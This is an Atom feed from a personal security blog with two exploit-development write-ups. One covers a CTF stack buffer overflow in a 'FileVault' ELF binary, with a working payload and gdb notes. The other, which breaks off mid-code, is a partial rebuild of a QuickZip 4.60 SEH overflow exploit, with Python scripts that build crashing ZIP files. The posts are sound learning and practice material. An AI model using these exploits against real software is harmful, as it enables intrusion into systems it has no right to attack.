atom.xml

<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">

  <title><![CDATA[Knapsy's brain dump]]></title>
  <link href="http://blog.knapsy.com/atom.xml" rel="self"/>
  <link href="http://blog.knapsy.com/"/>
  <updated>2018-08-06T15:03:44+10:00</updated>
  <id>http://blog.knapsy.com/</id>
  <author>
    <name><![CDATA[Knapsy]]></name>
    
  </author>
  <generator uri="http://octopress.org/">Octopress</generator>

  
  <entry>
    <title type="html"><![CDATA[FileVault CTF Challenge - ELF X64 Buffer Overflow]]></title>
    <link href="http://blog.knapsy.com/blog/2018/08/05/filevault-ctf-challenge-elf-x64-buffer-overflow/"/>
    <updated>2018-08-05T16:31:31+10:00</updated>
    <id>http://blog.knapsy.com/blog/2018/08/05/filevault-ctf-challenge-elf-x64-buffer-overflow</id>
    <content type="html"><![CDATA[<p>It&rsquo;s been quite a while since I have done a CTF, but just very recently I got a chance to participate in one and came across a pretty interesting challenge which forced me to go back and re-learn exploit dev in Unix environments. Also had to brush up on my <code>gdb</code> knowledge&hellip;</p>

<!--more-->


<h2>Background</h2>

<p>The challenge required participants to connect to a remote server on a specific port to interact with a simple <code>FileVault</code> application.</p>

<p>Offline copy of the application has been provided for analysis.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@debian:/opt/checksec# file FileVault 
</span><span class='line'>FileVault: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=24cf4afa0525b2c402542c56bbd80f585c80694f, stripped
</span><span class='line'>
</span><span class='line'>root@debian:/opt/checksec# ./checksec.sh --file FileVault 
</span><span class='line'>RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
</span><span class='line'>Partial RELRO   No canary found   NX disabled   PIE enabled     No RPATH   No RUNPATH   FileVault</span></code></pre></td></tr></table></div></figure>


<p>We&rsquo;re dealing with x64 ELF binary that doesn&rsquo;t have any protections enabled that should cause us any troubles later on.</p>

<h2>Understanding the application</h2>

<p>Let&rsquo;s play with the application and see what it does.</p>

<p><a href="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/Incorrect_code.png"><img src="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/Incorrect_code.png" alt="image" /></a></p>

<p>It expects some sort of a code (that we don&rsquo;t have).</p>

<p><a href="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/2.Code_too_long.png"><img src="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/2.Code_too_long.png" alt="image" /></a></p>

<p>Also let&rsquo;s note that when we provide code that is too long (more than 16 characters), we get a little bit different error message.</p>

<p>Let&rsquo;s throw the application into IDA and see what is it actually supposed to be doing.</p>

<p><a href="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/3.Main_func_strlen_check.png"><img src="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/3.Main_func_strlen_check.png" alt="image" /></a></p>

<p>As you can see, we&rsquo;re reading an input string using <code>scanf()</code> and check its length with <code>strlen()</code> - if it&rsquo;s longer than 16 characters, it displays additional error message (&ldquo;Incorrect login attempted.&rdquo;).</p>

<p>However, it&rsquo;s important to note that, apart from printing that error message, it doesn&rsquo;t actually do anything else, the application just continues execution.</p>

<p>Generally you&rsquo;d think that this sort of check would cause the application to exit if the condition is not met, but it&rsquo;s not the case here - we can simply ignore it and not worry about it at all.</p>

<p><a href="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/5.Decision_func.png"><img src="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/5.Decision_func.png" alt="image" /></a></p>

<p>This one is interesting, clearly there&rsquo;s some sort of decision mechanisms that establishes whether the code is valid or not.</p>

<p>After number of checks, if everything goes fine, we get to &ldquo;Shell Access Granted&rdquo; and call subroutine <code>sub_91A</code>.</p>

<p><a href="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/13.execfunc.png"><img src="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/13.execfunc.png" alt="image" /></a></p>

<p>And this function simply calls <code>/bin/sh -i</code> giving us back an interactive shell.</p>

<h2>Digging deeper</h2>

<p>As now we have an understanding what the application is doing, let&rsquo;s see if we can bypass the authentication mechanism. Remember that we can&rsquo;t simply patch the binary out as our end-goal is to exploit a remote instance, so most likely we&rsquo;ll need to come up with a remote exploit (or find the authentication code itself).</p>

<p>The first check the application does is on a variable <code>secret_0</code> (I have renamed them myself for clarity) - if it&rsquo;s value is <code>0</code> (ASCII) then it proceeds with further checks, otherwise, it fails right there.</p>

<p>But there&rsquo;s a problem&hellip; <code>secret_0</code> is actually initialised to <code>16</code> at the very beginning of that function and it&rsquo;s not being modified anywhere else along the way. How can it then ever equal <code>0</code>?!</p>

<p>The same thing applies for <code>secret_1</code> and <code>secret_2</code> variables, which expect certain values (<code>t0k3</code> and <code>n4m3</code> respectively), but are initialised to <code>0</code> too.</p>

<p>So how can we change the value of those variables, if we never get a chance to set them&hellip; or do we? ;)</p>

<h2>Simple buffer overflow</h2>

<p><a href="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/7.strcpy.png"><img src="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/7.strcpy.png" alt="image" /></a></p>

<p>Luckily for us, the application uses insecure <code>strcpy()</code> to copy user provided input into an initialised array of a set length. As <code>strcpy</code> does not do bounds checking, it simply copies entire input until it hits a NULL byte (end of a string - <code>\x00</code>), not caring about sizes at all.</p>

<p>As there are no input size checks performed by the application, we can use it try to overflow the buffer and set the relevant local variables to values we need.</p>

<p>Let&rsquo;s have a look at how the application initialises the local variables and what offsets we need to work with.</p>

<p><a href="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/8.calculate_offset.png"><img src="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/8.calculate_offset.png" alt="image" /></a></p>

<p>Let&rsquo;s analyse the above and picture how the stack will look like.</p>

<p>As the execution is passed to this subroutine, what&rsquo;s going to happen here (after the <a href="https://en.wikipedia.org/wiki/Function_prologue">function prologue</a>) is that the local variables (<code>src</code>, <code>dest</code>, <code>secret_2</code>, <code>secret_1</code> and <code>secret_0</code>) are going to be pushed onto the stack.</p>

<p>What order are they going to be pushed on? Look at the pointer arithmetic that IDA is showing us:</p>

<ul>
<li><code>secret_0</code> will end up in position of <code>base pointer (RBP)- 4 bytes</code></li>
<li><code>secret_1</code> in <code>RBP-8 bytes</code></li>
<li><code>secret_2</code> in <code>RBP-C</code> (in hex) and so on&hellip;</li>
</ul>


<p>This also gives us important information about the size of <code>dest</code> variable that we&rsquo;ll be overflowing - it&rsquo;s initiated size is, in hex, <code>20 - C</code> (difference between <code>secret_2</code> and <code>dest</code> offsets), which is <code>20 bytes</code>.</p>

<p>If we were to draw it, after initialisation of all local variables the stack will look as follows:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>** Assuming each "frame" is 4 bytes.
</span><span class='line'>
</span><span class='line'>                                      0x00000000 (lower memory addresses)
</span><span class='line'>+----------+        RBP-28
</span><span class='line'>|    SRC   |
</span><span class='line'>|----------|
</span><span class='line'>|          |
</span><span class='line'>|----------|        RBP-20        ||
</span><span class='line'>|   DEST   |                      ||  strcpy() writes
</span><span class='line'>|----------|                      ||  this way
</span><span class='line'>|          |                     \||/
</span><span class='line'>|----------|                      \/
</span><span class='line'>|          |
</span><span class='line'>|----------|
</span><span class='line'>|          |
</span><span class='line'>|----------|
</span><span class='line'>|          |
</span><span class='line'>|----------|        RBP-C
</span><span class='line'>| SECRET_2 |
</span><span class='line'>|----------|        RBP-8
</span><span class='line'>| SECRET_1 |
</span><span class='line'>|----------|        RBP-4
</span><span class='line'>| SECRET_0 |
</span><span class='line'>+----------+    &lt;== RBP
</span><span class='line'>                                      0xFFFFFFFF (higher memory addresses)</span></code></pre></td></tr></table></div></figure>


<p>Now, having that information, we can easily deduct that in order to overflow our variables, we need to first fill up the buffer of <code>dest</code> with <code>20 bytes</code> of garbage, next <code>4 bytes</code> would be our <code>secret_2</code>, followed by <code>4 bytes</code> for <code>secret_1</code> and last <code>4 bytes</code> for <code>secret_0</code>.</p>

<p>But what do we need to put in our secret variables? Pretty simple, let&rsquo;s just see what IDA shows us:</p>

<p><a href="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/5.Decision_func.png"><img src="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/5.Decision_func.png" alt="image" /></a></p>

<p>Easy! <code>secret_0</code> must be <code>0</code>, <code>secret_1</code> = <code>t0k3</code> and <code>secret_2</code> = <code>n4m3</code>.</p>

<p><strong>HOWEVER!</strong> Because of <a href="https://en.wikipedia.org/wiki/Endianness#Little-endian">Little Endianness</a>, the strings will have to be written <strong>in reverse</strong>!</p>

<p>So for <code>secret_1</code> and <code>secret_2</code> we&rsquo;ll need to write <code>3k0t</code> and <code>3m4n</code> respectively.</p>

<h2>Exploit</h2>

<p>Let&rsquo;s put our exploit to test! The payload we&rsquo;ll be sending is:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@debian:~# python -c 'print "A" * 20 + "3m4n" + "3k0t" + "0"'
</span><span class='line'>AAAAAAAAAAAAAAAAAAAA3m4n3k0t0</span></code></pre></td></tr></table></div></figure>


<p>And that&rsquo;s how it should look on the stack:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>** Assuming each "frame" is 4 bytes.
</span><span class='line'>
</span><span class='line'>BEFORE OVERFLOW                   AFTER OVERFLOW
</span><span class='line'>===============                   ==============
</span><span class='line'>                                                       0x00000000 (lower memory addresses)
</span><span class='line'>
</span><span class='line'> +----------+        RBP-28        +----------+
</span><span class='line'> |    SRC   |                      |          |
</span><span class='line'> |----------|                      |----------|
</span><span class='line'> |          |                      |          |
</span><span class='line'> |----------|        RBP-20        |----------|
</span><span class='line'> |   DEST   |                      |   AAAA   |         ||
</span><span class='line'> |----------|                      |----------|         ||  strcpy() writes
</span><span class='line'> |          |                      |   AAAA   |         ||  this way
</span><span class='line'> |----------|                      |----------|        \||/
</span><span class='line'> |          |                      |   AAAA   |         \/
</span><span class='line'> |----------|                      |----------|
</span><span class='line'> |          |                      |   AAAA   |
</span><span class='line'> |----------|                      |----------|
</span><span class='line'> |          |                      |   AAAA   |
</span><span class='line'> |----------|        RBP-C         |----------|            
</span><span class='line'> | SECRET_2 |                      |   3m4n   |
</span><span class='line'> |----------|        RBP-8         |----------|                        
</span><span class='line'> | SECRET_1 |                      |   3k0t   |
</span><span class='line'> |----------|        RBP-4         |----------|
</span><span class='line'> | SECRET_0 |                      |  0 \x00  |
</span><span class='line'> +----------+    &lt;== RBP           +----------+
</span><span class='line'>
</span><span class='line'>                                                       0xFFFFFFFF (higher memory addresses)</span></code></pre></td></tr></table></div></figure>


<p>Let&rsquo;s give it a shot!</p>

<p><a href="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/12.success.png"><img src="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/12.success.png" alt="image" /></a></p>

<p>W00t W00t, access granted! :)</p>

<h2>GDB Refresher</h2>

<p>This part is basically something for me to have to refer to when I come across something similar in the future.</p>

<p>As the challenge, in the end, turned out to be quite simple, I had to do some debugging in GDB to see if my offsets are right (and also because I have completely forgot about Little Endianness and my initial exploit didn&rsquo;t work!).</p>

<p>Just to make sure that everything works as expected, load up the application in GDB <code>gdb ./FileVault</code> and set a breakpoint on one command that we&rsquo;re interested in <code>breakpoint strcpy</code>.</p>

<p>Execute the application by invoking <code>run &lt; input</code>, where <code>input</code> is simply a text file with our paload generated in python (see above).</p>

<p>The execution will stop on <code>strcpy()</code> function, step through it by pressing <code>n</code> or typing in <code>finish</code> to step out of <code>strcpy()</code> routine.</p>

<p>As we hit first <code>cmp</code> instruction, see what sits under <code>rbp-0x4</code> by issuing <code>x/x $rbp-0x4</code> command.</p>

<p><a href="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/9.gdb_1.png"><img src="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/9.gdb_1.png" alt="image" /></a></p>

<p>Since we&rsquo;re comparing a <code>DWORD</code>, we only need to worry about <code>4 bytes</code>, in our case it&rsquo;s <code>0x00000030</code> (from memory), which matches what is in the instruction call (<code>0x30</code>).</p>

<p>Continue execution and investigate the following variables exactly same way.</p>

<p><a href="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/10.gdb_2.png"><img src="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/10.gdb_2.png" alt="image" /></a></p>

<p><a href="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/11.gdb_3.png"><img src="http://blog.knapsy.com/images/posts/2018-08-05-filevault-ctf-challenge-elf-x64-buffer-overflow/11.gdb_3.png" alt="image" /></a></p>

<h2>Summary</h2>

<p>All in all, it was pretty fun challenge that forced me to get back into exploit dev in Unix environments (I&rsquo;ve been mainly playing in Windows recently) and really stretched my memory on some basic concepts&hellip; which is great - gotta stay sharp! :)</p>
]]></content>
  </entry>
  
  <entry>
    <title type="html"><![CDATA[QuickZip 4.60 - Win7 X64 SEH Overflow (Egghunter) With Custom Encoder]]></title>
    <link href="http://blog.knapsy.com/blog/2017/05/01/quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/"/>
    <updated>2017-05-01T21:31:30+10:00</updated>
    <id>http://blog.knapsy.com/blog/2017/05/01/quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder</id>
    <content type="html"><![CDATA[<p>As a part of my preparations for the <a href="https://www.offensive-security.com/information-security-certifications/osce-offensive-security-certified-expert/">OSCE</a> exam, I have been trying to find some interesting exploits and PoC code to practice my skills on and learn something new in the exploit development department.</p>

<p>After some digging, I stumbled across a <a href="https://www.exploit-db.com/exploits/11656/">QuickZip v4.60 Buffer Overflow exploit</a>, which is very well documented by <a href="https://twitter.com/corelanc0d3r">corelanc0d3r</a> in a thorough blog post <a href="https://www.corelan.be/index.php/2010/03/27/quickzip-stack-bof-0day-a-box-of-chocolates/">here</a>.</p>

<p>Since the exploit itself is from 2010, it was designed to work on 32-bit Windows XP only. I decided to try and see if I can recreate it on a 64-bit Windows 7 and damn, was that a (fun) challenge!</p>

<!--more-->


<h2>PoC</h2>

<p>To get started, I grabbed the <a href="https://www.exploit-db.com/exploits/11656/">QuickZip v4.60 Windows XP exploit from exploit-db</a> and cut it down to create a simple PoC triggering a crash.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="c">#!/usr/bin/python</span>
</span><span class='line'>
</span><span class='line'><span class="n">header_1</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="n">header_2</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x24\x00\x00\x00\x00\x00\x00\x00</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="n">header_3</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="k">print</span> <span class="s">&quot;[+] Building PoC..&quot;</span>
</span><span class='line'>
</span><span class='line'><span class="n">max_size</span> <span class="o">=</span> <span class="mi">4064</span>
</span><span class='line'>
</span><span class='line'><span class="n">payload</span> <span class="o">=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="n">max_size</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;.txt&quot;</span>
</span><span class='line'>
</span><span class='line'><span class="k">print</span> <span class="s">&quot;[+] Length = &quot;</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span>
</span><span class='line'>
</span><span class='line'><span class="n">exploit</span> <span class="o">=</span> <span class="n">header_1</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="n">header_2</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="n">header_3</span>
</span><span class='line'>
</span><span class='line'><span class="n">mefile</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">&#39;cst.zip&#39;</span><span class="p">,</span><span class="s">&#39;w&#39;</span><span class="p">);</span>
</span><span class='line'><span class="n">mefile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">exploit</span><span class="p">);</span>
</span><span class='line'><span class="n">mefile</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span><span class='line'>
</span><span class='line'><span class="k">print</span> <span class="s">&quot;[+] Exploit complete!&quot;</span>
</span></code></pre></td></tr></table></div></figure>


<p>The above code creates a ZIP of a single file named 4064 A&rsquo;s followed by a &ldquo;.txt&rdquo; extension. <code>Header_1</code>, <code>header_2</code> and <code>header_3</code> are the headers required by the ZIP file structure. I won&rsquo;t go into the details of it, but you can read more about it on <a href="https://en.wikipedia.org/wiki/Zip_(file_format">here</a>.</p>

<p>If you open the created ZIP file in QuickZip and try to extract its contents (or just double-click on the filename), the QuickZip will crash.</p>

<h2>Understanding the crash</h2>

<p>Ok, let&rsquo;s run the PoC and see what actually happens.</p>

<p>Create the ZIP file using Python script above, open it up with QuickZip, start <code>ImmunityDebugger</code>, attach to the QuickZip process and, in QuickZip, double click on the filename to trigger the crash. <strong>Note:</strong> we will be repeating this process over, and over, and over again, so get used to it!</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/1.First_crash.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/1.First_crash.png" alt="image" /></a></p>

<p>Awesome, we triggered a crash as expected. Also, we got an exception - see the bottom of the screen <em>&ldquo;Access violation when writing to [00190000]&rdquo;</em>. What this means is that we were trying to write to an invalid memory address and we triggered an exception.</p>

<p>Let&rsquo;s investigate the SEH chain.</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/1.First_crash_SEH_chain.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/1.First_crash_SEH_chain.png" alt="image" /></a></p>

<p>Great, it appears that we&rsquo;re able to control nSEH pointer! Looks very promising. Let&rsquo;s try to figure out the offsets.</p>

<h2>Offsets</h2>

<p>As always, I&rsquo;m going to be using <code>mona</code> (<a href="https://github.com/corelan/mona">https://github.com/corelan/mona</a>) to help us out with a lot of tasks here.</p>

<p>First, let&rsquo;s generate a pattern of <strong>4064</strong> unique characters and put it in the payload of our PoC exploit:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>!mona pc 4064</span></code></pre></td></tr></table></div></figure>


<p>Let&rsquo;s trigger the crash again and see what happens.</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/2.Second%20crash.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/2.Second%20crash.png" alt="image" /></a></p>

<p>Hmm, the crash looks a bit different. The problem here is that <code>LEAVE</code> instruction tries to jump back to <code>0EEDFADE</code> address from the stack, which is an invalid memory address for this program.</p>

<p>Also, it doesn&rsquo;t appear that we&rsquo;re controlling the SEH anymore.</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/3.second%20crash%20-%20wrong%20SEH.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/3.second%20crash%20-%20wrong%20SEH.png" alt="image" /></a></p>

<p>However, notice that we&rsquo;re actually in a kernel module (see the name of the Immunity window - <em>&ldquo;CPU - main thread, module KERNELBA&rdquo;</em>). Pass the execution back to the program with <code>SHIFT + F9</code> and see if we trigger another exception, but in the QuickZip module.</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/4.proper%20crash.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/4.proper%20crash.png" alt="image" /></a></p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/5.proper%20SEH.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/5.proper%20SEH.png" alt="image" /></a></p>

<p>Awesome, looks like we&rsquo;re back in business!</p>

<p>Use the following command to let mona calculate all of the offsets:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>!mona findmsp</span></code></pre></td></tr></table></div></figure>


<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/6.mona%20findmsp.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/6.mona%20findmsp.png" alt="image" /></a></p>

<p>At this stage, the most interesting offset for us is <code>nSEH field: offset 292</code>.</p>

<p>Let&rsquo;s update the PoC with offsets information and try to trigger the crash again.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="c">#!/usr/bin/python</span>
</span><span class='line'>
</span><span class='line'><span class="n">header_1</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="n">header_2</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x24\x00\x00\x00\x00\x00\x00\x00</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="n">header_3</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="k">print</span> <span class="s">&quot;[+] Building PoC..&quot;</span>
</span><span class='line'>
</span><span class='line'><span class="n">max_size</span> <span class="o">=</span> <span class="mi">4064</span>
</span><span class='line'><span class="n">nseh_offset</span> <span class="o">=</span> <span class="mi">292</span>
</span><span class='line'>
</span><span class='line'><span class="n">payload</span> <span class="o">=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="n">nseh_offset</span>     <span class="c"># padding for nSEH</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;BBBB&quot;</span>               <span class="c"># nSEH</span>
